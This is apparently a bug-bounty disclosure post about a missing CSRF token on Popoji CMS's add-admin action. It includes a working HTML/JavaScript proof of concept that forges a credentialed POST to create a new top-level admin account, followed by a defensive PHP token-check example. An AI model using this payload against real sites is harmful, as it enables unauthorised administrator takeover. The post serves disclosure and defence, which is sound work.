Missing CSRF Token On Add Admin [Popoji CMS]

Description:

This happens because the request that adds an admin carries no CSRF token.

Steps To Reproduce :

<script>
function getMe() {
    // Build the cross-site POST to the add-admin endpoint
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://root/popoji/poadmin/route.php?mod=user&act=addnew", true);
    // Send the logged-in admin's session cookies with the request
    xhr.withCredentials = true;
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // The body contains no CSRF token
    xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashandy21%40gmail.com&no_telp=083833232954&level=1');
}
</script>
<button onclick="getMe()">Let's Rock</button>

1. Save the code as an .html file.
2. Upload it to a host.
3. Execute it.

Video :

https://www.youtube.com/watch?v=1FXXuSiB6jo

Fix & Mitigation :

Require a CSRF token on every request that performs a sensitive action.
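
One way to implement that check, as an added example that is not Popoji CMS code or its patch: a per-session synchronizer token embedded in the form and verified before any state-changing POST. The function names `csrf_token()` and `csrf_verify()`, the `csrf_token` field name and the form fields are hypothetical; it assumes standard PHP sessions.

```php
<?php
declare(strict_types=1);

// Added example: synchronizer-token CSRF defence for a state-changing
// admin action. Not Popoji CMS code; function names are hypothetical.

session_start();

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the CSPRNG, hex-encoded
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Compare the submitted token with the session copy in constant time. */
function csrf_verify(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && $submitted !== null
        && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject any state-changing request that lacks a valid token.
    $token = $_POST['csrf_token'] ?? null;
    if (!csrf_verify(is_string($token) ? $token : null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The add-user logic would run here, only after the check passes.
    exit('User created');
}
?>
<form method="post">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
    <input name="username">
    <input type="password" name="password">
    <button type="submit">Add user</button>
</form>
```

A forged cross-site request like the one above cannot supply the token, because the same-origin policy stops the other site's page from reading the form that contains it.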

Note:
They gave me permission to disclose it, and they say the patch will be deployed in the next version. So, if you use Popoji CMS, be careful: don't trust any link from unknown people, and keep your CMS updated. They also gave me a bounty for this! Yeey!

Published by

apapedulimu

Urip Kui Urup
